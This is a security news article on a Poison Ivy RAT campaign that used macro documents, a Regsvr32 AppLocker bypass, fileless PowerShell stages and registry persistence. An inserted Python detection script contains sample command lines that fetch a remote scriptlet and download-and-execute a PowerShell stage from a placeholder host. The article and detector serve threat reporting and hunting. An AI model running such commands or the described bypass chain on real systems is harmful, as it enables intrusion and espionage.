Poison Ivy RAT Campaign Leverages New Delivery Techniques

A recently observed campaign using the Poison Ivy remote access tool (RAT) against individuals within the Mongolian government uses publicly available techniques that haven’t been observed in previous campaigns, FireEye reports.

The Poison Ivy backdoor has been around for several years, targeting organizations all around the world, and was associated with a China-linked threat actor known as menuPass, Stone Panda and APT10. The malware packs capabilities such as key logging, screen and video capture, file transfers, password theft, system administration, traffic relaying, and more.

FireEye didn’t attribute the new campaign to a specific actor, and told SecurityWeek in an email that it can’t make direct connections to a particular group at this time. The security firm said it lacks visibility into what the actors did and admitted it doesn’t know if they were successful. Still, the company did say that “espionage is a reasonable assumption for their motives.”

What the newly observed campaign did show, however, was that the actor behind it is up-to-date with recent social engineering and evasion techniques and isn’t shy when it comes to using them. The attacks leveraged an AppLocker bypass that was publicly revealed last year, as well as fileless execution and persistence, and benign documents to minimize user suspicion of malicious activity.

The malware was distributed via Word documents with malicious macros, and the threat actor was using social engineering to trick users into enabling these macros. The malicious documents were delivered via email, claiming to contain instructions for logging into webmail or information regarding a state law proposal, FireEye explains.

The malicious macros in the documents were designed to invoke Regsvr32, a command-line utility designed for registering DLLs in the registry, to download a Windows Script Component file (SCT file) by passing the URL of the SCT file as an argument. This technique was demonstrated last year to effectively bypass AppLocker, the Microsoft application whitelisting solution that prevents unknown executables from running on a system.

In this campaign, the malicious SCT file was designed to invoke WScript to launch PowerShell in hidden mode with an encoded command, FireEye reports. After the PowerShell command is decoded, another layer of PowerShell instructions emerges, serving two purposes: to download a decoy document from the Internet and open it in a second winword.exe process using the Start-Process cmdlet; and to download and run another PowerShell script named f0921.ps1.

The third-stage PowerShell script establishes persistence by storing an encoded command as a base64 string in the HKCU:\Console\FontSecurity registry key, along with an HKCU\CurrentVersion\Run\SecurityUpdate value that launches the encoded PowerShell payload stored in that key. Thus, the PowerShell payload is executed every time the user logs in to the system.


A fourth-stage PowerShell script stored in the HKCU\Console\FontSecurity registry key borrows from the publicly available Inject-LocalShellCode script from PowerSploit to inject shellcode, researchers explain. The shellcode has a custom XOR-based decryption loop that uses a single-byte key (0xD4), and was designed to inject the Poison Ivy backdoor into userinit.exe. The decrypted shellcode also revealed content and configuration related to Poison Ivy.
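The delivery chain above (Regsvr32 fetching a remote SCT, WScript launching hidden encoded PowerShell, the f0921.ps1 download, and the payload staged under HKCU:\Console) leaves a distinctive trail in process-creation telemetry. The following is an added hunting example, not FireEye's or SecurityWeek's code: it runs detections for each of those steps over constructed Sysmon-style events, decoding the encoded command so the next stage becomes visible. The field names, hostnames, paths and the sample script text are assumptions made for the illustration.

```python
"""Hunting the Poison Ivy delivery chain described above.
Added example, not FireEye's or SecurityWeek's code: detections run over
constructed Sysmon-style process events; field names, hostnames, paths and
the sample script text are assumptions made for this illustration."""
import base64
import re

def encode_powershell(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed second stage mirroring the report: open a decoy, then fetch f0921.ps1.
STAGE2 = ("Start-Process winword.exe 'C:\\Users\\Public\\decoy.docx'; "
          "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/f0921.ps1')")

SAMPLE_EVENTS = [  # constructed telemetry, not captured from the campaign
    {"parent": "winword.exe", "cmdline":
        "regsvr32.exe /s /n /u /i:http://example.invalid/update.sct scrobj.dll"},
    {"parent": "wscript.exe", "cmdline":
        "powershell.exe -w hidden -nop -enc " + encode_powershell(STAGE2)},
    {"parent": "powershell.exe", "cmdline":
        "powershell.exe -c Set-ItemProperty HKCU:\\Console -Name FontSecurity -Value 'ZgBvAG8A'"},
    {"parent": "explorer.exe", "cmdline": "regsvr32.exe /s C:\\Vendor\\legit.dll"},
]

def analyse(event: dict) -> list:
    """Return the names of the detections an event triggers (empty = nothing suspicious)."""
    cmd, hits = event["cmdline"], []
    low = cmd.lower()
    # Regsvr32 fetching a scriptlet over HTTP: the AppLocker bypass used for delivery.
    if "regsvr32" in low and re.search(r"/i:https?://", low) and "scrobj.dll" in low:
        hits.append("regsvr32_remote_sct")
    # Hidden, encoded PowerShell spawned by the Windows Script Host (SCT -> WScript -> PowerShell).
    enc = re.search(r"-(?:enc|encodedcommand|e)\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    hidden = re.search(r"-w(?:indowstyle)?\s+hidden", low)
    if "powershell" in low and enc and hidden and event["parent"] in ("wscript.exe", "cscript.exe"):
        hits.append("wsh_hidden_encoded_powershell")
    # Decode the blob so the next stage's download and script name become visible.
    if enc:
        inner = base64.b64decode(enc.group(1)).decode("utf-16-le")
        if re.search(r"downloadstring|downloadfile", inner, re.I):
            hits.append("encoded_downloader")
        if "f0921.ps1" in inner:  # third-stage script name from the report
            hits.append("stage3_f0921")
    # A value written under HKCU:\Console, the staging location named in the report.
    if re.search(r"hkcu:?\\console", low) and "-value" in low:
        hits.append("console_key_payload")
    return hits

def scan(events: list) -> dict:
    """Map each event's index to its detections, keeping only events that fired."""
    return {i: analyse(e) for i, e in enumerate(events) if analyse(e)}
```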

“Although Poison Ivy has been a proven threat for some time, the delivery mechanism for this backdoor uses recent publicly available techniques that differ from previously observed campaigns. Through the use of PowerShell and publicly available security control bypasses and scripts, most steps in the attack are performed exclusively in memory and leave few forensic artifacts on a compromised host,” FireEye says.

Related: August Stealer Uses PowerShell for Fileless Infection

Related: Windows AppLocker Bypassed to Execute Remote Scripts

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
